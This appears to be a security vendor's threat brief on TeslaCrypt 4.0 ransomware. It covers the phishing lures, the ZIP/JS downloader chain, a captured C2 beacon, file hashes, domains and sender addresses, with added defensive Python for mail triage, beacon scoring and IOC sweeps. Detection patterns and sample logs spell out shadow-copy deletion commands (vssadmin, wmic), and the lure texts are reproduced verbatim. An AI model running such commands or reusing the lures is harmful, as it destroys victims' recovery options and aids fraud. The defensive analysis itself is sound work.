Cylance Quick Brief: TeslaCrypt 4.0

Over the past few weeks, our research teams here at Cylance have witnessed the emergence of an update to the highly prolific TeslaCrypt ransomware family. We were not alone in our observations, and many outlets have begun the requisite flurry of blogs, IOC updates and other threat-data sharing in the hope of helping the security industry curtail the threat.

The update, TeslaCrypt 4.0, includes stronger encryption (advertised by the authors as RSA-4096), bug fixes, formatting changes such as no longer appending an easily recognizable extension to encrypted files, and changes to the ransom note and instructions. Beyond this, the basic attack model remains the same.

TeslaCrypt: the Saga Continues

TeslaCrypt initially surfaced in March 2015 as aggressive ransomware that specifically targeted gamers. Players of some 40 popular games, including World of Warcraft, DayZ, Fallout, Diablo, Minecraft and Call of Duty, found themselves locked out of their games, with crucial and hard-earned files (saved games, maps, mods and configurations) maddeningly encrypted.

TeslaCrypt also sought out and encrypted valuable finance-related files such as tax returns and Quicken data files, plus files with common extensions such as JPEG, PDF and DOC. Newer generations no longer depend on the presence of game files and infect any machine they reach, as the ransomware continues to evolve. Once infected, the victim is asked to pay $500 in Bitcoin to have the locked files decrypted.

Security researchers were initially able to release a number of free decryption tools that exploited a weakness in how early versions handled key material, but version 3.0, released in January 2016, patched that flaw and rendered those tools ineffective.

Initial Deployment of Version 4.0

The initial campaigns for TeslaCrypt 4.0 were email based. The emails carried a malicious .ZIP attachment containing a .JS file. When run, the .JS file retrieves an executable from a remote server, and that second-stage executable performs the file encryption.


Figure 1: Malicious emails with TeslaCrypt .ZIP attachment

It is important to note that, as with other ransomware attacks, user interaction is required for TeslaCrypt to deploy successfully: the victim must be lured into manually opening and launching the attachment in the email. The actors behind this campaign have therefore updated their social engineering to make the email hooks more enticing and authentic in appearance, typically by preying on the user's fear of having a bank account compromised or of having made a mistake on their taxes.

Example Subject Lines:

Your account ID:69938 has been suspended.

Your account ID:11542 has been suspended.

Example Body Text:

Your bank account associated with the ID:11542 has been suspended because of the unusual activity connected to this account and a failure of the account holder to pay the taxes on a due date.

Your debt: - 341,24 USD

For more details and the information on how to unlock your account please refer to the document attached.

Example Attachment Names:

  • confirm_66988313.zip
  • warning_letter_43923148.zip
  • watch_it_89827269.zip
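The delivery chain described above (lure subject, ZIP attachment, script inside the ZIP) is what a mail gateway has to catch before the user ever double-clicks. The following is an added example of that triage logic, not code from the Cylance post: it builds a constructed sample message shaped like the campaign's (subject line, a single-member ZIP with a .js inside) entirely in memory, and returns a verdict. The subject regex, the script-extension list and the verdict rules are my own choices.

```python
"""Gateway-style triage of an inbound message: does it match the
'account suspended' lure, and does its ZIP attachment wrap a script?

Added example, not code from the Cylance post. The message and ZIP are
constructed inline; the regex, extension list and verdict rules are
assumptions of this example.
"""
import io
import re
import zipfile
from email.message import EmailMessage

# Extensions Windows hands to a script host or loader on double-click.
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
               ".ps1", ".cmd", ".bat", ".scr", ".exe"}
# Subject shape used by the campaign: "Your account ID:69938 has been suspended."
LURE_SUBJECT = re.compile(r"account\s+ID:\s*\d+\s+has been suspended", re.I)


def script_members(zip_bytes: bytes) -> list[str]:
    """Names of archive members whose final extension is a script/executable type."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename.lower()
            ext = name[name.rfind("."):] if "." in name else ""  # 'invoice.pdf.js' -> '.js'
            if ext in SCRIPT_EXTS:
                hits.append(info.filename)
    return hits


def triage(msg: EmailMessage) -> dict:
    """Return a verdict ('quarantine', 'hold' or 'deliver') and the reasons behind it."""
    reasons = []
    if LURE_SUBJECT.search(str(msg.get("Subject", ""))):
        reasons.append("subject matches the 'account suspended' lure")
    for part in msg.iter_attachments():
        fname = (part.get_filename() or "").lower()
        data = part.get_payload(decode=True) or b""
        # Check the magic bytes, not just the name: a renamed .zip is still a zip.
        if data.startswith(b"PK\x03\x04"):
            try:
                members = script_members(data)
            except zipfile.BadZipFile:
                reasons.append(f"attachment {fname} is a corrupt or truncated zip")
                continue
            if members:
                reasons.append(f"zip attachment {fname} carries script payload {members}")
    if any("script payload" in r for r in reasons):
        verdict = "quarantine"   # executable content inside an archive: block outright
    elif reasons:
        verdict = "hold"         # lure wording alone: hold for analyst review
    else:
        verdict = "deliver"
    return {"verdict": verdict, "reasons": reasons}


def build_message(subject: str, member_name: str) -> EmailMessage:
    """Construct a sample message with a one-member ZIP attachment (constructed, not a real capture)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member_name, "// stub content, stands in for the downloader\n")
    msg = EmailMessage()
    msg["Subject"] = subject
    msg["From"] = "sender@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg.set_content("For more details and the information on how to unlock "
                    "your account please refer to the document attached.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                       filename=member_name.rsplit(".", 1)[0] + ".zip")
    return msg


if __name__ == "__main__":
    lure = build_message("Your account ID:69938 has been suspended.", "confirm_66988313.js")
    print(triage(lure))
    print(triage(build_message("Q1 report", "report.txt")))
```

The magic-byte check matters more than the filename: renaming the attachment does not change what the user's archiver will open, and the member extension check looks at the last extension so double extensions such as invoice.pdf.js are still caught.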

Execution of TeslaCrypt 4.0

Once executed, TeslaCrypt's encryption routine and system modifications begin. The stronger cryptography in this version makes the previously successful recovery methods unusable: third-party decryption and recovery tools do not work against TeslaCrypt 4.0, and breaking the encryption directly is computationally infeasible.

To make matters worse, as with other recent ransomware, TeslaCrypt attempts to delete the Volume Shadow Copies (VSS snapshots) on the victim's machine, removing the most obvious recovery path.
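Shadow copy deletion is one of the few loud, host-level events in a ransomware run and is worth alerting on regardless of which family is responsible. The following is an added example, not code from the Cylance post, of detection logic run over process-creation telemetry. The post says only that TeslaCrypt deletes Volume Shadow Copies, not how; the command lines matched below (vssadmin, wmic, PowerShell against Win32_ShadowCopy) are the ones ransomware families commonly use and are an assumption of this example. The log format is a constructed, Sysmon-like "Key=Value | Key=Value" line, and the parent process filename in the sample is made up.

```python
"""Flag shadow-copy deletion in process-creation telemetry.

Added example, not code from the Cylance post. The log format and the
sample lines are constructed; the command lines are the ones commonly
used by ransomware, not something the post attributes to TeslaCrypt.
"""
import re

# Techniques that remove or starve VSS snapshots: (label, regex over a normalised command line).
SHADOW_TECHNIQUES = [
    ("vssadmin delete shadows",       re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b")),
    ("vssadmin resize shadowstorage", re.compile(r"\bvssadmin(?:\.exe)?\b.*\bresize\b.*\bshadowstorage\b")),
    ("wmic shadowcopy delete",        re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b")),
    ("powershell Win32_ShadowCopy",   re.compile(r"\bpowershell(?:\.exe)?\b.*\bwin32_shadowcopy\b.*\bdelete\b")),
]
# A parent launched from a user-writable location is the ransomware case; an admin console is not.
USER_WRITABLE = re.compile(r"\\(?:appdata|temp|tmp|downloads|users\\public)\\", re.I)


def parse_event(line: str) -> dict:
    """Split 'Key=Value | Key=Value' into a dict (constructed format standing in for Sysmon Event ID 1)."""
    fields = {}
    for chunk in line.split(" | "):
        key, sep, value = chunk.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def normalise(cmdline: str) -> str:
    """Drop quoting and collapse whitespace so '"vssadmin"  Delete Shadows' equals 'vssadmin delete shadows'."""
    return re.sub(r"\s+", " ", cmdline.replace('"', "")).strip().lower()


def detect(lines) -> list[dict]:
    """Return one alert per event whose command line matches a shadow-copy technique."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        cmd = normalise(ev.get("CommandLine", ""))
        for label, pattern in SHADOW_TECHNIQUES:
            if pattern.search(cmd):
                parent = ev.get("ParentImage", "")
                severity = "high" if USER_WRITABLE.search(parent) else "medium"
                alerts.append({"technique": label, "severity": severity,
                               "parent": parent, "cmd": cmd})
                break
    return alerts


# Constructed sample events; 'ghjkwe.exe' is a made-up dropper name.
SAMPLE_EVENTS = [
    'Image=C:\\Windows\\System32\\vssadmin.exe | CommandLine="vssadmin.exe"  Delete Shadows /All /Quiet'
    ' | ParentImage=C:\\Users\\bob\\AppData\\Roaming\\ghjkwe.exe',
    'Image=C:\\Windows\\System32\\wbem\\WMIC.exe | CommandLine=wmic shadowcopy delete'
    ' | ParentImage=C:\\Windows\\System32\\cmd.exe',
    'Image=C:\\Windows\\System32\\vssadmin.exe | CommandLine=vssadmin list shadows'
    ' | ParentImage=C:\\Windows\\System32\\cmd.exe',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Listing shadows is left alone; only deletion and storage-starving variants fire. The parent-path heuristic separates a backup administrator at a console (medium) from a binary running out of %APPDATA% (high), which is where a mail-delivered dropper typically lands.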


Figure 2: TeslaCrypt ransom note displayed as a Notepad file

C2 communications resemble the following (first-stage beacon; the captured body is binary and is reproduced below as escaped bytes, the long hexadecimal string being the encoded beacon payload):

  • URL: hxxp://marvel-games[.]com/binstr[.]php
  • Request line: POST /binstr.php HTTP/1.1
  • Content-Type: application/x-www-form-urlencoded
  • User-Agent: Mozilla/5.0 (Windows NT 6.3 rv:11.0) like Gecko
  • Host: marvel-games.com
  • Content-Length: 645
  • Cache-Control: no-cache
  • Body, as captured (the Accept header value was not preserved legibly and runs into this blob): \xff\xc1\x02X            1\x038\x01\xc1\x02n\x07\x01g\xf8t\xc1\x02, \, X 1\x03\xff\xc1\x02DCED486F16D001F6CA18E3D207F6ADCF1225FD4C843950AC2230FF235664BA07067CFBC16C72F08627A91036EEC585A4509F34FC01D8BD6BAD2F099C9D40FA31EB2E513E8C2AD2812BD305D36148FEBBE866E5AD616E88027F40E42DED, \xff\xc1\x02X 1\x038\x01\xc1\x02n\x07\x01g\xf8t\xc1\x02, \xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe2\xe2\xe2\x1d\xde\xde\xde#\xe3\xe3\xe3%\xfe\xfe\xfe\x13\xff\xff\xff\x02\xff\xff\xff
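Beyond the domain itself, the beacon above has two properties a network analyst can key on: the User-Agent is not one any real Internet Explorer 11 emits (a genuine string reads "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko", with a semicolon after the NT version and a Trident token, both missing here), and the body is raw binary despite a Content-Type of application/x-www-form-urlencoded. The following is an added example, not code from the Cylance post, that parses raw HTTP requests and scores them on those points plus the listed C2 domains and script path. Both sample requests are constructed; the beacon body is a short binary stand-in shaped like the capture, not the real 645-byte payload.

```python
"""Score captured HTTP requests for TeslaCrypt 4.0 beacon traits.

Added example, not code from the Cylance post. The domain and path sets
are the post's IOCs; the User-Agent and body checks are this example's
own heuristics; both requests below are constructed.
"""
import re
from urllib.parse import urlsplit

C2_DOMAINS = {"marvel-games.com", "grandmahereqq.com", "grandaareyoucc.asia",
              "kel52.com", "sappmtraining.com", "controlfreaknetworks.com"}
C2_PATHS = {"/binstr.php"}
# Real IE11: "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko".
# The beacon drops the ';' after the NT version and the Trident token.
MALFORMED_IE_UA = re.compile(r"Mozilla/5\.0 \(Windows NT [\d.]+ rv:11\.0\) like Gecko")
# Characters a genuine application/x-www-form-urlencoded body is made of.
URLENCODED_BODY = re.compile(rb"[A-Za-z0-9._~%+=&*-]*")


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.1 request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def score_request(raw: bytes) -> list[str]:
    """Return the list of beacon traits found in one request (empty means nothing matched)."""
    req = parse_request(raw)
    h = req["headers"]
    findings = []
    host = h.get("host", "").split(":")[0].lower().rstrip(".")
    if host in C2_DOMAINS or any(host.endswith("." + d) for d in C2_DOMAINS):
        findings.append(f"Host {host} is a listed TeslaCrypt C2 domain")
    path = urlsplit(req["target"]).path
    if req["method"] == "POST" and path in C2_PATHS:
        findings.append(f"POST to C2 script path {path}")
    if MALFORMED_IE_UA.fullmatch(h.get("user-agent", "")):
        findings.append("malformed IE11 User-Agent (missing ';' and Trident token)")
    ctype = h.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded") and req["body"] \
            and not URLENCODED_BODY.fullmatch(req["body"]):
        findings.append("Content-Type says form-urlencoded but body is binary")
    declared = h.get("content-length")
    if declared is not None and declared.isdigit() and int(declared) != len(req["body"]):
        findings.append(f"Content-Length {declared} does not match body size {len(req['body'])}")
    return findings


# Constructed samples, not packet captures from the post.
BEACON_BODY = b"\xff\xc1\x02X 1\x038\x01\xc1\x02n\x07\x01g\xf8t\xc1\x02" + b"\xe4\x1b\xe4\xe4" * 8
BEACON = (b"POST /binstr.php HTTP/1.1\r\n"
          b"Content-Type: application/x-www-form-urlencoded\r\n"
          b"User-Agent: Mozilla/5.0 (Windows NT 6.3 rv:11.0) like Gecko\r\n"
          b"Host: marvel-games.com\r\n"
          + f"Content-Length: {len(BEACON_BODY)}\r\n".encode()
          + b"Cache-Control: no-cache\r\n\r\n" + BEACON_BODY)
BENIGN = (b"POST /login HTTP/1.1\r\n"
          b"Host: www.example.com\r\n"
          b"User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
          b"Content-Type: application/x-www-form-urlencoded\r\n"
          b"Content-Length: 21\r\n\r\n"
          b"user=bob&pass=hunter2")

if __name__ == "__main__":
    print(score_request(BEACON))
    print(score_request(BENIGN))
```

The domain list alone goes stale as soon as the actors rotate infrastructure; the User-Agent and body-type mismatches survive that rotation, so they are the traits worth carrying into a proxy or IDS rule.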

Decryption Process

Payment to decrypt the user’s files is requested via Bitcoin (BTC) as per the instructions provided on the ransomware lock screen:


Figure 3: Ransom note generated by TeslaCrypt 4.0

As of March 2016, standard AV detection rates for TeslaCrypt remain abysmally low. Even with ample media coverage and exhaustive sharing of file details within the industry, we are still seeing very low detection rates for both the .JS and .EXE files associated with this threat.

Example:

One leading multi-engine upload site showed this sample with a 5/57 detection rate as of 3/24/2016:

SHA256 – 6964900cef84e768d69424e4950ac74992dbdf654e6865df59932dd4bd8f64bc

CylancePROTECT® vs. TeslaCrypt 4.0

Cylance pulled samples of the latest TeslaCrypt variant based on C2 domains and other relationship markers, and deployed them on a machine running CylancePROTECT. In this round we looked at 60 unique binaries, and CylancePROTECT detected and blocked 100% of them using a mathematical detection model that pre-dates the current TeslaCrypt campaigns.

Once again, the math prevails and prevents a potentially catastrophic ransomware attack:


Figure 4: CylancePROTECT console showing detection of TeslaCrypt 4.0

Hashes (SHA256):

  • 6cb9ef0cb238752db082c482a35053d0dddff28becf1cfbb4a632d72aced1e2c
  • 50f84771d333540c969ec2183f7712e53ab0a387191c7b58678eae82fd548456
  • a7fd86ee2179598a7830d16f1b3c3b3bd7c89d5c03c993c9a0819665977dfe69
  • 5aa6a88868308064e1f9f8df3477addd3baf5e864523717d2b654705f4630588
  • 593543fffae9c12cb2d527c405309b46575aa111d64689d593785643e1294b30
  • f5a5102bae7fbf31ab2318c8d0feb9c691d1d7345d3f3885edeb2cf41edda596
  • b29b77d35c65b2543f1d7a8fe7feb64cefe2204a3fb2225cb4c7c4a4734b0cdc
  • 475022ad1c94da21d90cc48523f92a91533781c9c3101c7f64cbf8d2e6e05819
  • 6bdab9543a8ac059bb2b333755da5d534f8430aa09f9e4a359e78151d2aeb1b5
  • b568d4b836139baa0123fd5eabdde20bfabe05324ba7d68bfc2b02efa0bb6b0b
  • 1d8e0998e760a690070d1101b72c10ce129378e8a212221b04c5b866f6634d2c
  • e1ea9a411a2bea988c2b921871849b9b9039193104c885bedb99f8c8d3bb1214
  • 062dbdad33b58903a14bb49d2888714deb45ff7439bd28ebe8660d2ef4fcc1a0
  • 6964900cef84e768d69424e4950ac74992dbdf654e6865df59932dd4bd8f64bc
  • 72c11bc4998ba5b2c5717af04187259f6ddc9297ebd092f2aa1c32d165fd2648
  • 4b60a413c2c3c7608b8473eb2d6941b5ef7c4663a07fabb58e1985bd5a29ba38
  • 16e2d300a5133c6a0ff21e7cb6575507405df4c096828424eb370fdec4e2f89f
  • 2433f6e17cf7381cec531acb490fc13399392bc5dfe340f2549555923293a983
  • f581ea4ba7a3c58ef8dd5923401cd720a3fc7c58e13c1101471d8ca090d9f3c2
  • 8dbcc4795a8f9f6fc02aac62a0498ddbc6592ba34d1cc8eeea8a2cf18511da78
  • ef0df94ca52c835a74d047de808e9c24f31c9468953a11c0cc76cc97432d1647
  • 48b6f4c6a99547fdd9bdff0b815f1c6582664d6c366c7dd5962c730c2656f750
  • ad89f8066a368c14418d1c3b8144454f22d784f10785958142a934dc36e616a9
  • b253da1456b47de73f146ef395ae8e4b105751acaddf8b2fcb9e50398b79b27c
  • 943b2d3ac10936ef65244c894d831dddd22cd865d8e6b6fe9fbf50876f6781ce
  • 3189ad72d4c817ad4dcc4320eed86157d1c5232393a186a47efba5c6149198a6
  • ad0a52c915f4eb78c59e54db0f441edddaf56a9d6a812bedb1b52a910248072f
  • b2f857e052924061c219b6462a06f2b6221409e706204c4e247611bfbfa71cf2
  • 95f49139ff0f98af8ac0f26b15f4add0c56c45afb2261eb257c6cc44f4f76d34
  • 673d694e9debc2832baab93b633a815dc478453bf429551364902297493dd7ba
  • 644c54329771fa735a34390e72532e0262ce9f0ca6e18ccefd4d141aa4d5995b
  • 42e562c5902cbd0a531a41925956c632e1e957f7f79cb58b1310eedd1cf77921
  • c830dc7f823c71e50b0302849d4e546f4dae75dea8694fef903991c6759f9feb
  • 7da88e7719267a69d75bd8a44455a7d4e9cabf0c1639c7d200243517b354dd17
  • f8b4ca84f342d351ce94342dd77fe8c420fca157c6de31ced78d278e8d514b7c
  • e823b0bf0935559e2913b3adb6d650d85f2fe8345aa3d5321f235a7261ec12ef
  • b1064d0229bee77960dda91ad91b1fc77a0e13e4139a9e04539dc1107e1163fc
  • 839067b46b94eaa4d471d39229bf8b77fc4e333e3ba2c8358ef4e0f85ff5aa20
  • e052f248f9a4e667b9c4658e8340811c6fff2db35f79e88756af680d3f12e2af
  • ebafe18803975341b9a6f4cee298a5e8a2adb7df539dff722f1689b4ca6999cb
  • 8331e625dc343d59c007f4814d88ba4ca59090db37102b41b7acac97a2044356
  • 9d27684ad3cfe7036b0f8b76146485c4808088767fd7de70381e7dd42b866b1f
  • 0f79116e2d6a2259724f48f79c89421f50d2dee82b279f24c50d364337cfe8de
  • 3906731fd5c73b193b03251a6922d7a3c8ac0b248e9cc52f3a0997e9c6b2a24b
  • 0f50bdaa0c6576ac49ab48582ea5108083f1cd8fc439bc3737967729985818f3
  • 86ee7197f19434ca385204b94acda7af8671c0db3103cbcfe9e21651c3df60b3
  • 4c749298a32f1913282dd7cffeb23bacfbe9164b85673e54a78e5b708a87ecaa
  • 584d2cc682be4cd81117f4aec2bcf8600a209482609ab2b4a3a7f02bf314436a
  • d62ad20b0b0f314d32a45688d8b47f85e0b0eae9a18e5533ac2d37c2fa530f63
  • 6e151355866e68cb527c593a543604e80c2e14b9c12d733c90fdf1e7a213e1cf
  • bf403e9f57535c440870ca92aedb324a10c998d0c3aac158e5108150e89a0fb4
  • 9731588e5bd63200f01d21707293beeadca9da38d791d65486bd805ef914a252
  • 7db62797f09e8b4c91b54ad84c3f904643ff7e6a2cb9162a59f05a88ad84719a
  • 1ab761f6c5659b57f8dc82d59aa756ae4ff68d5e31010d448f13110bf9d04efb
  • 3ae6099b7cd27530c11d74c25becf5b73910bf63d8e2b430b49e12177126e7ef
  • e15e39032dac05b65e78b044d44215742aee475cebf5ddcc1199fc0c8ac43f22
  • d3b16261b5b5ee7c4ced37f58bd307f5a6bc7771e7ba5ffcd9dd07cc84225479
  • 086691503751c00b0a28323507543e01478a26a1ca8d3af5b0e36b0f63dfab04
  • 16097d181bfd788211e2efb5d259b125ad196454fee49e763c0327d58e0fd0e1
  • 93ad40cd3fd7d5934e37b3ed09f44dc70cc616326b41578f549c6477bbf6cfe1

Additional Indicators of Compromise (IOCs)

Domains:

  • marvel-games.com
  • grandmahereqq.com
  • grandaareyoucc.asia
  • kel52.com
  • sappmtraining.com
  • controlfreaknetworks.com

Email Senders:

  • gaskellBeverley76675 (at) vocationalalternatives.com
  • sutcliffeLester87269 (at) thiagoamaroarquitetura.com
  • mousleyHarris145 (at) questcomputersolutions.com
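The indicators in this post are published defanged (hxxp, [.], (at)), so the first step in using them is to normalise them back into matchable form, and the second is to match domains by suffix rather than equality so that subdomains hit and look-alikes such as notmarvel-games.com do not. The following is an added example, not code from the Cylance post, that refangs the domains, URL and sender addresses above, sweeps constructed proxy and MTA log lines with them, and hashes a directory tree against the SHA256 list. The log lines and the file it hashes are constructed; the indicator strings are the post's.

```python
"""Refang the post's defanged IOCs and sweep logs and files with them.

Added example, not code from the Cylance post. Log lines and the sample
file are constructed; defang conventions handled are the common ones.
"""
import hashlib
import os
import re
import tempfile
from urllib.parse import urlsplit

DEFANGED = [
    "hxxp://marvel-games[.]com/binstr[.]php",
    "grandmahereqq[.]com", "grandaareyoucc[.]asia", "kel52[.]com",
    "sappmtraining[.]com", "controlfreaknetworks[.]com",
    "gaskellBeverley76675 (at) vocationalalternatives.com",
    "sutcliffeLester87269 (at) thiagoamaroarquitetura.com",
    "mousleyHarris145 (at) questcomputersolutions.com",
]
# One of the SHA256 values listed in the post.
SHA256_IOCS = {"6964900cef84e768d69424e4950ac74992dbdf654e6865df59932dd4bd8f64bc"}


def refang(ioc: str) -> str:
    """Undo hxxp://, [.] / (.) / {.} and (at) / [at] defanging."""
    s = ioc.strip()
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.I)
    s = re.sub(r"[\[\(\{]\.[\]\)\}]", ".", s)
    s = re.sub(r"\s*[\[\(](?:at|@)[\]\)]\s*", "@", s, flags=re.I)
    return s


def build_ioc_sets(defanged):
    """Sort refanged indicators into domain, e-mail and URL sets (all lower-cased)."""
    domains, emails, urls = set(), set(), set()
    for raw in defanged:
        ioc = refang(raw)
        if "://" in ioc:
            urls.add(ioc.lower())
            domains.add(urlsplit(ioc).hostname.lower())
        elif "@" in ioc:
            emails.add(ioc.lower())
        else:
            domains.add(ioc.lower())
    return domains, emails, urls


def domain_matches(host: str, domains) -> bool:
    """Exact or subdomain match; 'notmarvel-games.com' must not match 'marvel-games.com'."""
    host = host.lower().rstrip(".")
    return host in domains or any(host.endswith("." + d) for d in domains)


URL_RE = re.compile(r"https?://[^\s\"']+")
ADDR_RE = re.compile(r"<([^<>\s]+@[^<>\s]+)>")


def sweep_logs(lines, domains, emails):
    """Return (line number, kind, value) for each URL host or sender address that hits an IOC."""
    hits = []
    for n, line in enumerate(lines, 1):
        for url in URL_RE.findall(line):
            host = urlsplit(url).hostname or ""
            if domain_matches(host, domains):
                hits.append((n, "domain", host))
        for addr in ADDR_RE.findall(line):
            if addr.lower() in emails:
                hits.append((n, "sender", addr))
    return hits


def sha256_file(path: str, chunk: int = 1 << 20) -> str:
    """Stream the file so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep_files(root: str, hashes) -> list[str]:
    """Paths under root whose SHA256 is in the IOC set."""
    found = []
    for d, _, files in os.walk(root):
        for name in files:
            path = os.path.join(d, name)
            if sha256_file(path) in hashes:
                found.append(path)
    return found


def sweep_demo():
    """Write a constructed file and sweep it: its own hash hits, the post's IOC hashes do not."""
    with tempfile.TemporaryDirectory() as root:
        path = os.path.join(root, "sample.bin")
        with open(path, "wb") as f:
            f.write(b"constructed sample content, not malware\n")
        own = sha256_file(path)
        return bool(sweep_files(root, {own})), sweep_files(root, SHA256_IOCS)


SAMPLE_LOGS = [  # constructed proxy and MTA lines
    "1458777600.123 10.0.0.5 TCP_MISS/200 645 POST http://marvel-games.com/binstr.php - DIRECT/198.51.100.7",
    "1458777601.456 10.0.0.5 TCP_MISS/200 1200 GET http://cdn.marvel-games.com/x.js - DIRECT/198.51.100.7",
    "1458777602.789 10.0.0.9 TCP_MISS/200 500 GET http://notmarvel-games.com/ - DIRECT/203.0.113.9",
    "Mar 24 09:12:01 mx postfix/qmgr[1234]: 7F3A2: from=<gaskellBeverley76675@vocationalalternatives.com>, size=48213",
]

if __name__ == "__main__":
    doms, mails, _ = build_ioc_sets(DEFANGED)
    print(sweep_logs(SAMPLE_LOGS, doms, mails))
    print(sweep_demo())
```

Hash matching is exact by nature and only catches the 60 binaries listed; a repacked build will miss, which is why the domain and sender sweeps (and the behavioural checks earlier in this post) matter more than the hash list for anything beyond confirming a known sample.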

Believe the math!!